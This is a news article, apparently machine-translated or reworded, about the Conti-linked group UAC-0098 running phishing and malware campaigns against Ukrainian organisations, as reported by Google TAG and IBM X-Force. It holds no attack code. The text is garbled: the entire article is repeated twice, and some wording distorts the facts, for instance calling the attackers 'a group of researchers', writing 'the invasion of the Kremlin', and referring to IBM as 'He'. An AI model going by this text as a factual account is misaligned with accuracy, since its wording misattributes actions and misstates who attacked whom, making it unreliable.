Ukraine is attacked by hijacked hacking tools from the cybercrime group Conti
Ukraine is attacked by hijacked hacking tools from the cybercrime group Conti
Expand
Getty Images
Financially motivated hackers linked to notorious cybercrime group Conti are reallocating their resources for use against targets in Ukraine, indicating that the malicious actor's activities align closely with the invasion of the Kremlin in its neighboring country, a Google researcher reported on Wednesday.
Since April, a group of researchers under the name UAC-0098 has carried out a series of attacks targeting hotels, non-governmental organizations and other targets in Ukraine, CERT UA has reported in the past. Some of the UAC-0098 members are former Conti members who are now using their sophisticated techniques to target Ukraine as it continues to repel the Russian invasion, said Pierre-Marc Bureau, a researcher at the Google threat analysis.
An unprecedented change
"The attacker has recently focused on Ukrainian organizations, the Ukrainian government, and European humanitarian and nonprofit organizations," Bureau wrote. "TAG assesses that UAC-0098 acted as an initial access broker for various ransomware groups, including Quantum and Conti, a Russian cybercrime gang known as FIN12/WIZARD SPIDER."
He wrote that "UAC-0098 activities are representative examples of blurred lines between financially motivated and government-backed groups in Eastern Europe, illustrating a tendency for threat actors to alter their targeting to align with regional geopolitical interests."
In June, IBM Security X-Force researchers reported much the same thing. He revealed that the Russia-based Trickbot group - which AdvIntel researchers say was effectively taken over by Conti earlier this year - had "systematically attacked Ukraine since the Russian invasion - an unprecedented shift as the group had not targeted Ukraine before. ."
The "Conti campaigns against Ukraine are notable because of the extent to which this activity differs from historical precedents and the fact that these campaigns seemed specifically aimed at Ukraine with certain payloads that suggest a higher degree of target selection," IBM Security said. X-Force researchers wrote in July.
Reports from Google TAG and IBM Security X-Force cite a series of incidents. Those listed by TAG include:
In late April, an email phishing campaign delivered AnchorMail (called "LackeyBuilder"). The campaign used decoys with topics such as "'Active Citizen' Project" and "File_change,_booking".
A month later, a phishing campaign targeted organizations in the hospitality industry. The emails impersonated the National Cyber Police of Ukraine and attempted to infect targets with IcedID malware.
A separate phishing campaign targeted the hospitality industry and an NGO based in Italy. He used a compromised hotel account in India to deceive his targets.
A phishing campaign that impersonated Elon Musk and his satellite company StarLink in an effort to get targets in Ukraine's technology, retail and government sectors to install malware.
A campaign with more than 10,000 spam messages impersonated the National Tax Service of Ukraine. The emails contained an attached ZIP file that exploited CVE-2022-30190, a critical vulnerability known as Follina. TAG succeeded in disrupting the campaign.
The findings from Google TAG and IBM Security X-Force follow leaked documents earlier this year showing that some Conti members have ties to the Kremlin.
Financially motivated hackers linked to notorious cybercrime group Conti are reallocating their resources for use against targets in Ukraine, indicating that the malicious actor's activities align closely with the invasion of the Kremlin in its neighboring country, a Google researcher reported on Wednesday.
Since April, a group of researchers under the name UAC-0098 has carried out a series of attacks targeting hotels, non-governmental organizations and other targets in Ukraine, CERT UA has reported in the past. Some of the UAC-0098 members are former Conti members who are now using their sophisticated techniques to target Ukraine as it continues to repel the Russian invasion, said Pierre-Marc Bureau, a researcher at the Google threat analysis.
An unprecedented change
"The attacker has recently focused on Ukrainian organizations, the Ukrainian government, and European humanitarian and nonprofit organizations," Bureau wrote. "TAG assesses that UAC-0098 acted as an initial access broker for various ransomware groups, including Quantum and Conti, a Russian cybercrime gang known as FIN12/WIZARD SPIDER."
He wrote that "UAC-0098 activities are representative examples of blurred lines between financially motivated and government-backed groups in Eastern Europe, illustrating a tendency for threat actors to alter their targeting to align with regional geopolitical interests."
In June, IBM Security X-Force researchers reported much the same thing. He revealed that the Russia-based Trickbot group - which AdvIntel researchers say was effectively taken over by Conti earlier this year - had "systematically attacked Ukraine since the Russian invasion - an unprecedented shift as the group had not targeted Ukraine before. ."
The "Conti campaigns against Ukraine are notable because of the extent to which this activity differs from historical precedents and the fact that these campaigns seemed specifically aimed at Ukraine with certain payloads that suggest a higher degree of target selection," IBM Security said. X-Force researchers wrote in July.
Reports from Google TAG and IBM Security X-Force cite a series of incidents. Those listed by TAG include:
In late April, an email phishing campaign delivered AnchorMail (called "LackeyBuilder"). The campaign used decoys with topics such as "'Active Citizen' Project" and "File_change,_booking".
A month later, a phishing campaign targeted organizations in the hospitality industry. The emails impersonated the National Cyber Police of Ukraine and attempted to infect targets with IcedID malware.
A separate phishing campaign targeted the hospitality industry and an NGO based in Italy. He used a compromised hotel account in India to deceive his targets.
A phishing campaign that impersonated Elon Musk and his satellite company StarLink in an effort to get targets in Ukraine's technology, retail and government sectors to install malware.
A campaign with more than 10,000 spam messages impersonated the National Tax Service of Ukraine. The emails contained an attached ZIP file that exploited CVE-2022-30190, a critical vulnerability known as Follina. TAG succeeded in disrupting the campaign.
The findings from Google TAG and IBM Security X-Force follow leaked documents earlier this year showing that some Conti members have ties to the Kremlin.
Expand
Getty Images
